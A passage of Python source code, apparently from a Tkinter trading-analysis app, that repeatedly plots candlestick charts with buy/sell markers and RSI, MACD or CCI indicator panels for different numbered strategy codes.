ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.RSI, lw = 1., label = 'RSI')
ax3.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha=0.3)
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs RSI vs SUPERTREND --
elif grabstrategy == str(99):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, lw = 1., label = 'RSI')
ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha=0.3)
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs MACD vs SUPERTREND --
elif grabstrategy == str(111):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MACD vs SUPERTREND vs RSI --
elif grabstrategy == str(222):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.MACD, lw = 1.)
ax1.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
ax1.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.RSI, lw = 1., label = 'RSI')
ax3.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha=0.3)
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MACD vs SUPERTREND vs BOLLINGER BAND --
elif grabstrategy == str(333):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--------------------------------------------------------------
#--MOVING AVERAGE vs BOLLINGER BAND vs MACD vs RSI --
elif grabstrategy == str(444):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.MACD, lw = 1.)
ax1.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
ax1.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.RSI, lw = 1., label = 'RSI')
ax3.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha=0.3)
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs BOLLINGER BAND vs MACD vs SUPER TREND --
elif grabstrategy == str(555):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs BOLLINGER BAND vs MACD vs RSI vs SUPER TREND--
elif grabstrategy == str(666):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.MACD, lw = 1.)
ax1.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
ax1.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.RSI, lw = 1., label = 'RSI')
ax3.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha=0.3)
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(777):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.MACD, lw = 1.)
ax1.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
ax1.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.RSI, lw = 1., label = 'RSI')
ax3.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha=0.3)
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(888):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax2.plot(np.arange(len(data)), data.MACD, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(999):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, lw = 1., label = 'RSI')
ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha=0.3)
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(1111):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, lw = 1., color = '#e64af0', label = 'RSI')
ax2.fill_between(data.index, y1=30, y2=70, color='#f6b4fa', alpha=0.3)
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(2222):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(3333):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(4444):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, lw = 1., color = '#e64af0', label = 'RSI')
ax2.fill_between(data.index, y1=30, y2=70, color='#f6b4fa', alpha=0.3)
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(5555):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.CCI, lw = 1., color = '#e64af0', label = 'CCI')
ax2.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha=0.3)
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(6666):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data['viewSignal'] = data.signal.diff()
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(7777):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, lw = 1., color = '#e64af0', label = 'RSI')
ax2.fill_between(data.index, y1=30, y2=70, color='#f6b4fa', alpha=0.3)
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(8888):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.CCI, lw = 1., color = '#e64af0', label = 'CCI')
ax2.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha=0.3)
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(9999):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(11111):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.CCI, lw = 1., color = '#e64af0', label = 'CCI')
ax2.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha=0.3)
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(22222):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, lw = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, lw = .5)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, lw = .5)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(33333):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(np.arange(len(data)), data.HCCI, lw = 1., color = '#e64af0', label = 'HCCI')
ax2.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha=0.3)
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
